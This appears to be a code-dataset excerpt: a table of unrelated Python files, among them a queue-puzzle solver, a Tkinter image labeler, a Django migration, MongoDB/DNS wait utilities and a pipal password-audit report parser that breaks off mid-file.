index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
994,200 | b49c9caaba16a6917e0f337c50dadc75e6dd4718 | from sys import stdin
from collections import deque
"""
# sin guardar los equipos
def main():
conta = 1
n = int(stdin.readline())
while n != 0:
print("Scenario","#"+str(conta))
teams = deque()
for i in range(n):
m = list(stdin.readline().split())
teams += deque(m[1:])
cola = deque()
com = list(stdin.readline().split())
while com[0] != "STOP":
if com[0] == "ENQUEUE":
cola.append(com[1])
else:
print(cola.popleft())
com = list(stdin.readline().split())
conta+=1
print()
n = int(stdin.readline())
main()
"""
# guardando loes equipos :V :V
def main():
    """Solve the 'Team Queue' problem (scenarios read from stdin).

    Input per scenario: n, then n lines of 'k id1 ... idk' team rosters,
    then ENQUEUE x / DEQUEUE / STOP commands; a lone 0 terminates.
    An enqueued element joins the tail of its team's group if teammates
    are already queued, otherwise its team joins the back of the queue.
    """
    scenario = 1
    n = int(stdin.readline())
    while n != 0:
        print("Scenario", "#" + str(scenario))
        # Map element id -> team index; ids fit below 1,000,000.
        team_of = [0] * 1000000
        for i in range(n):
            roster = list(map(int, stdin.readline().split()))
            for member in roster[1:]:  # roster[0] is the member count
                team_of[member] = i
        queue = deque()  # FIFO of per-team deques currently in line
        team_queues = [deque() for _ in range(n)]
        command = stdin.readline().split()
        while command[0] != "STOP":
            if command[0] == "ENQUEUE":
                x = int(command[1])
                t = team_of[x]
                # A team enters the main queue exactly when its first
                # currently-waiting member arrives. (The original
                # duplicated the append in both branches of an if/else.)
                if not team_queues[t]:
                    queue.append(team_queues[t])
                team_queues[t].append(x)
            else:  # DEQUEUE
                front_team = queue.popleft()
                print(front_team.popleft())
                if front_team:
                    # Team still has waiting members: keep it at the front.
                    queue.appendleft(front_team)
            command = stdin.readline().split()
        scenario += 1
        n = int(stdin.readline())
        print()
|
994,201 | dafb5bcde2d1cc8014266c54cd986c20f13dd9d8 | import serial
import time
import configparser
import os
from helpers import parseData, buildSerial
# NOTE(review): indentation was lost when this snippet was flattened into
# the dataset; the statements below are the original top-to-bottom order.
def main():
# Read config.ini sitting next to this script.
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "config.ini"))
print("Starting serial connection")
# buildSerial comes from the project-local helpers module; presumably it
# returns a pyserial connection for the configured device -- TODO confirm.
ser = buildSerial(config["APP"]["DEVICE"])
while True:
# Poll twice a second; only read when bytes are already buffered.
if(ser.inWaiting() > 0):
data = ser.readline().decode("ascii").rstrip()
print(data)
parseData(data)
time.sleep(0.5)
if __name__ == '__main__':
main()
|
994,202 | 57960d32fc3e22ea87791478537f34fcd46ead4c | from flask import Flask
app = Flask(__name__)
@app.route('/')
def hello_world():
    """Flask view for '/': return a static greeting string."""
    greeting = 'Hello World!'
    return greeting
def user_login(func):
    """Decorator that prints a login message before delegating to *func*.

    Fixes two defects in the original: the wrapper discarded *func*'s
    return value, and it accepted no arguments, so it could only wrap
    zero-argument callables. Backward compatible with existing uses.
    """
    def inner(*args, **kwargs):
        print('登录')
        return func(*args, **kwargs)
    return inner
# Demo view: user_login prints its login message first, then the body runs.
@user_login
def news():
print('新闻详情')
# Module-level demo call (runs at import time).
news()
# show_news = user_login(news)
# show_news()
# print(show_news.__name__)
if __name__ == '__main__':
app.run()
|
994,203 | e2fd602e017a91e9ad025f7bed6a03810af885d1 | # -*- coding: utf-8 -*-
# this file is generated by gen_kdata_schema function, dont't change it
from zvt.domain.quotes.stock.stock_1d_money_flow import *
from zvt.domain.quotes.stock.stock_1m_kdata import *
from zvt.domain.quotes.stock.stock_1m_hfq_kdata import *
from zvt.domain.quotes.stock.stock_5m_kdata import *
from zvt.domain.quotes.stock.stock_5m_hfq_kdata import *
from zvt.domain.quotes.stock.stock_15m_kdata import *
from zvt.domain.quotes.stock.stock_15m_hfq_kdata import *
from zvt.domain.quotes.stock.stock_30m_kdata import *
from zvt.domain.quotes.stock.stock_30m_hfq_kdata import *
from zvt.domain.quotes.stock.stock_1h_kdata import *
from zvt.domain.quotes.stock.stock_1h_hfq_kdata import *
from zvt.domain.quotes.stock.stock_4h_kdata import *
from zvt.domain.quotes.stock.stock_4h_hfq_kdata import *
from zvt.domain.quotes.stock.stock_1d_kdata import *
from zvt.domain.quotes.stock.stock_1d_hfq_kdata import *
from zvt.domain.quotes.stock.stock_1d_bfq_kdata import *
from zvt.domain.quotes.stock.stock_1wk_kdata import *
from zvt.domain.quotes.stock.stock_1wk_hfq_kdata import *
from zvt.domain.quotes.stock.stock_1wk_bfq_kdata import *
from zvt.domain.quotes.stock.stock_1mon_kdata import *
from zvt.domain.quotes.stock.stock_1mon_hfq_kdata import *
from zvt.domain.quotes.stock.stock_1mon_bfq_kdata import *
from zvt.domain.quotes.stock.stock_emotion_factor import *
from zvt.domain.quotes.stock.stock_growth_factor import *
from zvt.domain.quotes.stock.stock_momentum_factor import *
from zvt.domain.quotes.stock.stock_pershare_factor import *
from zvt.domain.quotes.stock.stock_quality_factor import *
from zvt.domain.quotes.stock.stock_risk_factor import *
from zvt.domain.quotes.stock.stock_style_factor import *
from zvt.domain.quotes.stock.stock_technical_factor import *
from zvt.domain.quotes.stock.stock_basics_factor import *
|
994,204 | 7de977bef33c341a368e81f45ab87ee2566b3afa | from socket import *
# Get the computer's host name
hostname=gethostname()
# Get the local IP address
ip=gethostbyname(hostname)
clientPort=7179 # How can we know our own local port before connecting? NOTE(review): this constant is only displayed; the OS picks the real ephemeral port.
serverName = 'localhost'
serverPort = 12000
clientSocket = socket(AF_INET, SOCK_STREAM) # Create the client socket: AF_INET selects IPv4; SOCK_STREAM makes this a TCP (not UDP) socket.
print('A client is running.')
print("The client address: ('", str(ip), "', ", str(clientPort), ')')
clientSocket.connect((serverName, serverPort))
print('Connected to ', serverName, ':', serverPort, '.') # connect() takes the server-side (hostname, port); after this line the three-way handshake has completed and a TCP connection exists.
while True:
sentence = input('Send a request:')
clientSocket.send(sentence.encode()) # Send the string sentence to the server
modifiedSentence = clientSocket.recv(1024) # Receive the reply
if sentence == 'Time':
print('Received the current system time on the server: ',modifiedSentence.decode(),'.') # decoded reply string
elif sentence == 'Exit':
print('Received a response: ',modifiedSentence.decode())
break
clientSocket.close() # Close the socket
|
994,205 | bfef6782ecca067645aaf2556a11714c91c0995b | # This one is like your scripts with argv
def print_two(*args):
    """Unpack exactly two positional arguments and print them."""
    first, second = args
    print(f"arg1: {first}, arg2: {second}")
# Ok, thats *args is actually pointless, we can just do this
def print_two_again(arg1, arg2):
    """Same output as print_two, but with explicitly named parameters."""
    message = f"arg1: {arg1}, arg2: {arg2}"
    print(message)
# This jest takes one argument
def print_one(arg1):
    """Print a single labeled argument."""
    print("arg1: {}".format(arg1))
# This one takes no arguments
def print_none():
    """Take no arguments and print a canned message."""
    message = "I got notin'."
    print(message)
print_two("Michael","Leslie")
print_two_again("Michael","Leslie")
print_one("First!")
print_none()
|
994,206 | e1a41ea1fcd7d21060a8071b75d592f413163003 | import os
import Tkinter as tk
import sqlite3
import logging
import threading
import time
import numpy as np
from PIL import Image, ImageTk
from collections import deque
from argparse import ArgumentParser
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def load_raw_images(folder):
    """Load every .jpg in *folder* as a [filepath, numpy-array] pair.

    Logs an error and returns an empty list when *folder* is not a
    directory.
    """
    images = []
    if not os.path.isdir(folder):
        logger.info('ERROR %s is not found.' % (folder))
        return images
    logger.info('loading %s...' % (folder))
    for name in os.listdir(folder):
        if not name.endswith('.jpg'):
            continue
        path = os.path.join(folder, name)
        images.append([path, np.array(Image.open(path))])
    return images
# Background writer that persists labeled images into a SQLite table.
# NOTE(review): Python-2 code (uses the builtin `buffer`); indentation was
# lost in dataset extraction -- statements are in original order.
class Saver(object):
def __init__(self, db_name, table_name):
self.table_name = table_name
self.db_name = db_name
# Worker loop: creates the sqlite connection on this thread, drains the
# queue twice a second while self.running, then flushes the remainder.
def run(self):
self.connection = sqlite3.connect(self.db_name)
self.cursor = self.connection.cursor()
self.cursor.execute("""CREATE TABLE IF NOT EXISTS %s(
id INTEGER PRIMARY KEY AUTOINCREMENT,
image BLOB NOT NULL,
width INTEGER NOT NULL,
height INTEGER NOT NULL,
label TEXT NOT NULL);""" % (self.table_name))
# NOTE(review): self.entry is created here on the worker thread; a
# save_async() call racing ahead of run() would hit AttributeError.
self.entry = deque()
self.running = True
while self.running:
if len(self.entry) > 0:
e = self.entry.popleft()
logger.info('saving entry %s: %s' % (e[0].shape, str(e[1])))
self.cursor.execute(("""INSERT INTO %s(image, width, height, label)
VALUES(?, ?, ?, ?);""" % self.table_name),
(buffer(e[0].reshape(-1)), e[0].shape[1], e[0].shape[0], str(e[1]),))
time.sleep(0.5)
logger.info('flusing data...')
# Final drain after self.running is cleared (e.g. on window close).
while len(self.entry) > 0:
e = self.entry.popleft()
self.cursor.execute(("""INSERT INTO %s(image, width, height, label)
VALUES(?, ?, ?, ?);""" % self.table_name),
(buffer(e[0].reshape(-1)), e[0].shape[1], e[0].shape[0], str(e[1]),))
# Single commit at shutdown; rows are lost if the process dies earlier.
self.connection.commit()
self.connection.close()
# Queue an image (numpy array) plus label for the worker thread.
def save_async(self, image, label):
logger.info('%s:%s' % (str(image.shape), str(label)))
self.entry.append([image, str(label)])
# Spawn the worker thread running self.run.
def start(self):
self.task = threading.Thread(target=self.run)
self.task.start()
class LabelUI(object):
def __init__(self, db_name, table_name,
images, image_width=640, image_height=480):
self.saver = Saver(db_name, table_name)
self.saver.start()
self.width = image_width
self.height = image_height
self.root = tk.Tk()
self.root.protocol("WM_DELETE_WINDOW", self.on_close)
self.canvas = tk.Canvas(self.root,
width=image_width, height=image_height)
self.canvas.bind('<ButtonPress-1>', self.on_press)
self.canvas.bind('<B1-Motion>', self.on_move)
self.canvas.bind('<ButtonRelease-1>', self.on_release)
self.canvas.pack(side=tk.LEFT)
self.labeling_panel = tk.PanedWindow(self.root)
self.save_button = tk.Button(self.labeling_panel, text='Save',
command=self.save_image)
self.save_button.pack(side=tk.TOP)
self.skip_button = tk.Button(self.labeling_panel, text='Skip',
command=self.skip_image)
self.skip_button.pack(side=tk.TOP)
self.remove_last_button = tk.Button(self.labeling_panel, text='Remove Last',
command=self.remove_last)
self.remove_last_button.pack()
block_choise = [
['H', 'H'],
['I', 'I'],
['W', 'W'],
['N', 'N'],
['R', 'R'],
['O', 'O'],
['B', 'B'],
['T', 'T'],
['2', '2'],
['0', '0'],
['1', '1'],
['7', '7'],
['others', 'others']
]
self.choise_var = tk.StringVar(self.labeling_panel, value=block_choise[0][0])
self.choise = []
for text, mode in block_choise:
b = tk.Radiobutton(self.labeling_panel,
text=text,
value=mode,
variable=self.choise_var,
indicatoron=1)
b.deselect()
b.pack(anchor=tk.W)
self.choise.append(b)
self.labeling_panel.pack(side=tk.RIGHT)
self.image_index = 0
self.images = images
self.rois = []
self.mouse_press = False
if len(self.images) == 0:
logger.info('no image found')
self.on_close()
self.load_image()
def on_close(self):
self.saver.running = False
self.root.destroy()
def load_image(self):
image = self.images[self.image_index][1]
img = Image.fromarray(image)
self.tk_image = ImageTk.PhotoImage(img)
self.canvas.create_image(
self.width / 2, self.height / 2, image=self.tk_image)
def on_press(self, event):
self.mouse_press = True
self.sx = event.x
self.sy = event.y
self.cx = event.x
self.cy = event.y
self.render()
def on_move(self, event):
self.cx = event.x
self.cy = event.y
self.render()
def on_release(self, event):
self.mouse_press = False
self.cx = event.x
self.cy = event.y
if self.choise_var.get() != '':
self.rois.append([self.sx, self.sy, self.cx, self.cy, self.choise_var.get()])
self.render()
def render(self):
text_padding = 10
self.load_image()
for roi in self.rois:
self.canvas.create_rectangle(roi[0], roi[1],
roi[2], roi[3], width=2, outline='green')
self.canvas.create_text(roi[0], roi[1] - text_padding, text=roi[4],
fill='green', width=2)
# draw temp
if self.mouse_press:
self.canvas.create_rectangle(self.sx, self.sy, self.cx, self.cy, width=2,
outline='red')
self.canvas.create_text(self.sx, self.sy - text_padding,
text=self.choise_var.get(),
width=2, fill='red')
def remove_last(self):
if len(self.rois) > 0:
self.rois = self.rois[:-1]
self.render()
def load_next(self):
self.image_index += 1
if self.image_index == len(self.images):
logger.info('done labeling, closing...')
self.on_close()
else:
self.load_image()
self.render()
def skip_image(self):
self.rois = []
self.load_next()
def save_image(self):
self.saver.save_async(self.images[self.image_index][1], self.rois)
self.skip_image()
def start(self):
self.root.mainloop()
def main():
# CLI: output sqlite db/table plus the folder of .jpg images to label.
parser = ArgumentParser()
parser.add_argument('--db-name', dest='db_name',
default='duckymomo.sqlite3', help='output database name',)
# NOTE(review): help text below was copy-pasted from --db-name and should
# read 'output table name' (runtime string, so not changed here).
parser.add_argument('--table-name', dest='table_name',
default='blocks', help='output database name',)
parser.add_argument('--folder', dest='folder',
default='duckymomo', help='input image folder')
args = parser.parse_args()
images = load_raw_images(args.folder)
ui = LabelUI(args.db_name, args.table_name, images)
ui.start()
if __name__ == '__main__':
main()
|
994,207 | 5d6dcce87357fc354b96057b804d4b424f9485a6 | fold_model = "./results/svm_ovr/"
# NOTE(review): fragment of a larger script -- n_shuffles, index_list, XX,
# TT, n, trainpercentile and the svm/multiclass/np/io/pd/metrics imports
# are defined outside this chunk; indentation was lost in extraction.
if not os.path.exists(fold_model):
os.makedirs(fold_model)
clf =svm.LinearSVC(class_weight= 'balanced', verbose = 1)
mc= multiclass.OneVsRestClassifier(clf)
accs = []
for j in n_shuffles:
#np.random.shuffle(index)
index = index_list[j]
X = XX[index, :]
Y = TT[index, :]
n_train=int(n*trainpercentile)
n_test=n-n_train
X_train = X[0:n_train,:].astype(np.float32)
X_test = X[n_train:n,:].astype(np.float32)
Y_train=Y[0:n_train,:]
Y_test=Y[n_train:X.shape[0],:]
# One-hot label matrices -> class indices.
Y_true=np.argmax(Y_test,1)
Yt=np.argmax(Y_train,1)
feats = [np.zeros(268)]
# NOTE(review): only clf is fitted, yet the loop below reads
# mc.estimators_ -- the OneVsRestClassifier is never fitted, so this
# should raise at runtime; `mc.fit(X_train, Yt)` (and `mc.predict`
# below) was likely intended. Confirm against the original script.
clf.fit(X_train,Yt)
for estim in mc.estimators_:
feats = np.append(feats,[estim.coef_], axis=0)
io.savemat(fold_model +'features_fold_' + str(j)+ '.mat', {'features': feats})
yPred = clf.predict(X_test)
acc = metrics.accuracy_score(Y_true, yPred)
accs.append(acc)
df = pd.DataFrame(data={'true':Y_true ,'pred': yPred})
df.to_csv(fold_model+'res_fold_' +str(j) + '.csv', index = False)
print('Fold= ', j, ' completed ' )
# NOTE(review): j is the for-loop variable; this increment has no effect.
j = j + 1
print('SVM OVR end...') |
994,208 | 7d74b4afebc4d9c1817065d7bc2f220f7c73326a | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('text', models.TextField()),
('author', models.ForeignKey(related_name='comments', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Host',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=50)),
('startup', models.CharField(max_length=50, null=True, blank=True)),
('time', models.DateTimeField(null=True, blank=True)),
('is_current', models.BooleanField(default=False)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('text', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('author', models.ForeignKey(related_name='questions', to=settings.AUTH_USER_MODEL)),
('host', models.ForeignKey(related_name='questions', to='ama.Host')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Subscriber',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('email', models.EmailField(max_length=75)),
('host', models.ForeignKey(related_name='subscribers', to='ama.Host')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='comment',
name='question',
field=models.ForeignKey(related_name='comments', to='ama.Question'),
preserve_default=True,
),
]
|
994,209 | 2a692b65ced5359ea58844975957102dcca28bc5 | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
"""幸运数字猜猜猜 2.0 于文斌 2020年5月30日"""
import random

# Fix: the original called random.randint(0, 9) afresh at every comparison,
# so the win check and the too-high/too-low hints each referred to a
# *different* secret number. Draw the lucky number once up front.
lucky = random.randint(0, 9)
n = 1
while n < 4:
    number = input("请您猜0-9中一个数字")
    guess = int(number)
    if n == 3:
        # Third and final attempt: either win or run out of tries.
        if guess == lucky:
            print("恭喜您,GOODLUCK!")
            print("您和python太有缘分了,lets go on!")
            break
        else:
            print("对不起次数已经用尽")
            break
    if guess == lucky:
        print("恭喜您,GOODLUCK!")
        print("您和python太有缘分了,lets go on!")
        break
    else:
        # Give a consistent higher/lower hint against the same secret.
        if guess > lucky:
            print("抱歉您猜大了,请再猜一次")
        else:
            print("抱歉您猜小了,请再猜一次")
        n = n + 1
print("GAME OVER")
|
994,210 | cdc3df62293bf5c8023d84437ab7d99cccdaa6cb | # Source : https://oj.leetcode.com/problems/sqrtx/
# Author : Ping Zhen
# Date : 2017-04-17
'''**********************************************************************************
*
* Implement int sqrt(int x).
*
* Compute and return the square root of x.
*
**********************************************************************************''' |
994,211 | f6edf0d4e9229e6198674ae62bd6873c91bbc730 | from os import makedirs
from os.path import join, split, isdir
import create_eml
import db
import media_download_stats as stats
import pandas
def mkdir_if_not_exists(directory):
    """Create *directory* (including parents) unless it already exists."""
    if isdir(directory):
        return
    makedirs(directory)
def convert_filepath_to_urlpath(filepath):
    """Map a local tmp file path to its public RSS URL.

    Everything after the first 'tmp' in *filepath* is appended to the
    MorphoSource RSS root.
    """
    suffix = filepath.split('tmp')[1]
    return 'https://www.morphosource.org/rss' + suffix
# Count ms_media_files rows whose parent media file is *mf_id*.
# NOTE(review): connection is never closed; acceptable for a one-shot
# reporting script, but worth fixing if this runs repeatedly.
def get_num_mf_derived_from(mf_id):
conn = db.db_conn()
c = conn.cursor()
sql = """
SELECT * FROM `ms_media_files`
WHERE `derived_from_media_file_id` = %s
"""
db_result = db.db_execute(c, sql, mf_id)
return len(db_result)
# Count ms_media rows whose parent media group is *m_id*.
# (Mirror of get_num_mf_derived_from for the media-group table.)
def get_num_m_derived_from(m_id):
conn = db.db_conn()
c = conn.cursor()
sql = """
SELECT * FROM `ms_media`
WHERE `derived_from_media_id` = %s
"""
db_result = db.db_execute(c, sql, m_id)
return len(db_result)
def gen_csv(recordset, csvpath):
mkdir_if_not_exists(split(csvpath)[0])
conn = db.db_conn_socket()
c = conn.cursor()
sql = """
SELECT * FROM `ms_media_download_stats` AS s
LEFT JOIN `ca_users` AS u ON u.user_id = s.user_id
LEFT JOIN `ms_media_files` AS mf ON mf.media_file_id = s.media_file_id
LEFT JOIN `ms_media` AS m ON m.media_id = s.media_id
LEFT JOIN `ms_specimens` as sp ON sp.specimen_id = m.specimen_id
LEFT JOIN `ms_specimens_x_taxonomy` AS sxt ON sxt.specimen_id = sp.specimen_id
LEFT JOIN `ms_taxonomy_names` AS t ON t.alt_id = sxt.alt_id
WHERE `recordset` = %s
"""
download_requests = db.db_execute(c, sql, recordset)
mf_dict = {}
mg_dict = {}
for dl in download_requests:
if 'media_file_id' in dl and dl['media_file_id'] is not None:
print dl['media_file_id']
mf_id = dl['media_file_id']
if mf_id not in mf_dict:
mf_dict[mf_id] = []
mf_dict[mf_id].append(dl)
if 'media_id' in dl and dl['media_id'] is not None:
mg_id = dl['media_id']
if mg_id not in mg_dict:
mg_dict[mg_id] = []
mg_dict[mg_id].append(dl)
m_stats = {}
for mg_id, mg_array in mg_dict.iteritems():
m_stats[mg_id] = {
'mg_array': mg_array,
'mg_stats': stats.MediaDownloadStats(mg_array),
'mf_dict': {},
'mf_stats_dict': {}
}
for mf_id, mf_array in mf_dict.iteritems():
mg_id = mf_array[0]['media_id']
m_stats[mg_id]['mf_dict'][mf_id] = mf_array
m_stats[mg_id]['mf_stats_dict'][mf_id] = stats.MediaDownloadStats(mf_array)
usage_report = pandas.DataFrame(columns=
['media_file_id',
'media_file_derived_from',
'num_media_files_derived_from_this',
'media_group_id',
'media_group_derived_from',
'num_media_groups_derived_from_this',
'specimen_id',
'specimen_institution_code',
'specimen_collection_code',
'specimen_catalog_number',
'specimen_genus',
'specimen_species',
'total_downloads',
'dl_intended_use_School',
'dl_intended_use_School_K_6',
'dl_intended_use_School_7_12',
'dl_intended_use_School_College_Post_Secondary',
'dl_intended_use_School_Graduate_school',
'dl_intended_use_Education',
'dl_intended_use_Education_K_6',
'dl_intended_use_Education_7_12',
'dl_intended_use_Education_College_Post_Secondary',
'dl_intended_use_Educaton_general',
'dl_intended_use_Education_museums_public_outreach',
'dl_intended_use_Personal_interest',
'dl_intended_use_Research',
'dl_intended_use_Commercial',
'dl_intended_use_Art',
'dl_intended_use_other',
'dl_intended_use_3d_print',
'total_download_users',
'u_affiliation_Student',
'u_affiliation_Student:_K-6',
'u_affiliation_Student:7-12',
'u_affiliation_Student:_College/Post-Secondary',
'u_affiliation_Student:_Graduate',
'u_affiliation_Faculty',
'u_affiliation_Faculty:_K-6',
'u_affiliation_Faculty:7-12',
'u_affiliation_Faculty_College/Post-Secondary',
'u_affiliation_Staff:_College/Post-Secondary',
'u_affiliation_General_Educator',
'u_affiliation_Museum',
'u_affiliation_Museum_Curator',
'u_affiliation_Museum_Staff',
'u_affiliation_Librarian',
'u_affiliation_IT',
'u_affiliation_Private_Individual',
'u_affiliation_Researcher',
'u_affiliation_Private_Industry',
'u_affiliation_Artist',
'u_affiliation_Government',
'u_affiliation_other',
])
for m_id, s in m_stats.iteritems():
# Add media group row
mg = s['mg_array'][0]
mg_stats = s['mg_stats']
row = {
'media_file_id': None,
'media_file_derived_from': None,
'num_media_files_derived_from_this': None,
'media_group_id': m_id,
'media_group_derived_from': mg['derived_from_media_id'],
'num_media_groups_derived_from_this': get_num_m_derived_from(m_id),
'specimen_id': mg['specimen_id'],
'specimen_institution_code': mg['institution_code'],
'specimen_collection_code': mg['collection_code'],
'specimen_catalog_number': mg['catalog_number'],
'specimen_genus': mg['genus'],
'specimen_species': mg['species'],
'total_downloads': mg_stats.total_downloads,
'total_download_users': mg_stats.total_users
}
for use, num in mg_stats.intended_use_dict.iteritems():
row['dl_intended_use_' + use] = num
for demo, num in mg_stats.user_demo_dict.iteritems():
row['u_affiliation_' + demo.replace(' ', '_')] = num
usage_report = usage_report.append(row, ignore_index=True)
# Add media files row
for mf_id, mf_array in s['mf_dict'].iteritems():
mf_stats = s['mf_stats_dict'][mf_id]
mf = mf_array[0]
row = {
'media_file_id': mf_id,
'media_file_derived_from': mf['derived_from_media_file_id'],
'num_media_files_derived_from_this': get_num_mf_derived_from(mf_id),
'media_group_id': mf['media_id'],
'media_group_derived_from': mf['derived_from_media_id'],
'num_media_groups_derived_from_this': get_num_m_derived_from(mf['media_id']),
'specimen_id': mf['specimen_id'],
'specimen_institution_code': mf['institution_code'],
'specimen_collection_code': mf['collection_code'],
'specimen_catalog_number': mf['catalog_number'],
'specimen_genus': mf['genus'],
'specimen_species': mf['species'],
'total_downloads': mf_stats.total_downloads,
'total_download_users': mf_stats.total_users
}
for use, num in mf_stats.intended_use_dict.iteritems():
row['dl_intended_use_' + use] = num
for demo, num in mf_stats.user_demo_dict.iteritems():
row['u_affiliation_' + demo.replace(' ', '_')] = num
usage_report = usage_report.append(row, ignore_index=True)
usage_report.to_csv(csvpath, index=False, index_label=False)
# Build the EML metadata file describing the generated download-report CSV;
# delegates the actual XML writing to the project create_eml module.
def gen_eml(recordset, r_name, publisher, p_name, xmlpath, csvpath):
title = 'Download report for MorphoSource media for recordset ' + recordset
desc = 'Report of downloads of MorphoSource media associated with recordset ' + recordset + ' with intended download uses and downloading user profile affiliations.'
# Public URL corresponding to the local CSV path.
link = convert_filepath_to_urlpath(csvpath)
ac = False
create_eml.gen_eml_file(title, desc, link, ac, recordset, r_name, publisher, p_name, xmlpath)
def gen_files(recordset, r_name, publisher, p_name, dirpath):
csvpath = join(dirpath, 'datasets', 'dl.csv')
gen_csv(recordset, csvpath)
gen_eml(recordset, r_name, publisher, p_name, join(dirpath, 'eml', 'dl.xml'), csvpath) |
994,212 | 03614eac51d4afc0a3918b0be3c1c3160ba3e4b9 | import click
from pymongo import MongoClient
import socket
import time
# ------------------------- CLI ----------------------
@click.group()
def cli():
# Root command group; subcommands attach via @cli.command().
pass
@cli.command()
@click.argument('hostname')
def wait_for_dns(hostname):
# Block until HOSTNAME resolves (see __wait_for_dns below).
__wait_for_dns(hostname)
@cli.command()
def wait_for_local_dns():
# Wait for this machine's own hostname to become resolvable.
__wait_for_dns(socket.gethostname())
@cli.command()
@click.argument('hosts', nargs=-1)
def wait_for_mongo(hosts):
# Wait until every given mongo HOST answers server_info().
__wait_for_mongo(hosts)
# ------------------------- internal ----------------------
# Check each host in turn: MongoClient connects lazily, and server_info()
# forces a round-trip, waiting up to 60s per host before pymongo raises.
def __wait_for_mongo(hosts):
for host in hosts:
# try to connect for 60s
click.echo("waiting for " + host)
client = MongoClient(host = [host], serverSelectionTimeoutMS = 60000)
client.server_info()
def __wait_for_dns(hostname):
    """Poll DNS until *hostname* resolves, for roughly five minutes.

    The original comment promised a 5-minute window, but its loop was
    `range(0, 1)` and so tried exactly once before raising. 60 attempts
    with a 5s pause restores the intended behavior.

    Returns None on success; raises TimeoutException on failure.
    """
    attempts = 60  # 60 tries x 5s sleep ~= 5 minutes
    for _ in range(attempts):
        try:
            socket.gethostbyname(hostname)
            return None
        except socket.gaierror:
            # Name not (yet) resolvable -- back off and retry.
            time.sleep(5)
    raise TimeoutException("Timed out trying to resolve " + hostname)
class TimeoutException(Exception):
    """Raised when a hostname cannot be resolved within the retry window."""

    def __init__(self, msg):
        # Keep the message on the instance; str() shows its repr, which
        # matches the original behavior exactly.
        self.msg = msg

    def __str__(self):
        return repr(self.msg)
if __name__ == '__main__':
cli()
|
994,213 | e59a861a4b62bbefeb6b1f0fef5b770a0f77bfc5 | #!/usr/bin/env python3
import argparse
import os
import re
import sys
import time
from reportgen import Reportgen
class Pipal_Eater(object):
def __init__(self):
self.file = None
self.verbose = False
self.version = '0.1'
self.pipal_file_content = {}
self.start_time = time.time()
self.report_generator_module = Reportgen()
def signal_handler(self, signal, frame):
print('You pressed Ctrl+C! Exiting...')
sys.exit(0)
def cls(self):
os.system('cls' if os.name == 'nt' else 'clear')
def cmdargs(self):
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', nargs=1, metavar='pipal.txt' ,help='The file containing raw pipal output')
parser.add_argument('-v', '--verbose', help='Optionally enable verbosity', action='store_true')
self.args = parser.parse_args()
def read_file(self):
if self.args.verbose is True:
print('[+] Opening file {}'.format(self.args.file[0]))
try:
with open(self.args.file[0]) as f:
self.pipal_file_content = (f.readlines())
self.pipal_file_content = [x.strip() for x in self.pipal_file_content]
except Exception as e:
print('\n[!] Couldn\'t open file: \'{}\' Error:{}'.format(self.args.file,e))
sys.exit(0)
if self.args.verbose is True:
for line in self.pipal_file_content:
print(''.join(line))
def parse(self):
for i, line in enumerate(self.pipal_file_content):
if 'Total entries' in line:
self.total = line
if 'Total unique' in line:
self.unique = line
#read 11 lines starting with this heading, always 10 long so range 11 works
if 'Top 10 passwords' in line:
self.top_10 = []
for z in range(11):
self.top_10.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
#read 11 lines starting with this heading, always 10 long so range 11 works
if 'Top 10 base words' in line:
self.top_10_base = []
for z in range(11):
self.top_10_base.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
#range is dependent on the length of passwords cracked, 0-??. need to count lines to next if statement first for range
if 'length ordered' in line:
self.lengths = []
for z in range(11):
self.lengths.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'count ordered' in line:
self.counts = []
for z in range(11):
self.counts.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'One to six characters' in line:
self.one_to_six = []
for z in range(15):
self.one_to_six.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last number' in line:
self.trailing_number = []
for z in range(11):
self.trailing_number.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last digit' in line:
self.last_1digit = []
for z in range(11):
self.last_1digit.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last 2 digits' in line:
self.last_2digit = []
for z in range(11):
self.last_2digit.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last 3 digits' in line:
self.last_3digit = []
for z in range(11):
self.last_3digit.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last 4 digits' in line:
self.last_4digit = []
for z in range(11):
self.last_4digit.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last 5 digits ' in line:
self.last_5digit = []
for z in range(11):
self.last_5digit.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Character sets' in line:
self.charset = []
for z in range(24):
self.charset.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
def report(self):
"""run the docx report. text files happen in the respective functions"""
#i need to figure out how to pass all these in a list or something, woof.
self.report_generator_module.run(\
self.total,\
self.unique,\
self.top_10,\
self.top_10_base,\
self.lengths,\
self.counts,\
self.one_to_six,\
self.trailing_number,\
self.last_1digit,\
self.last_2digit,\
self.last_3digit,\
self.last_4digit,\
self.last_5digit,\
self.charset)
def end(self):
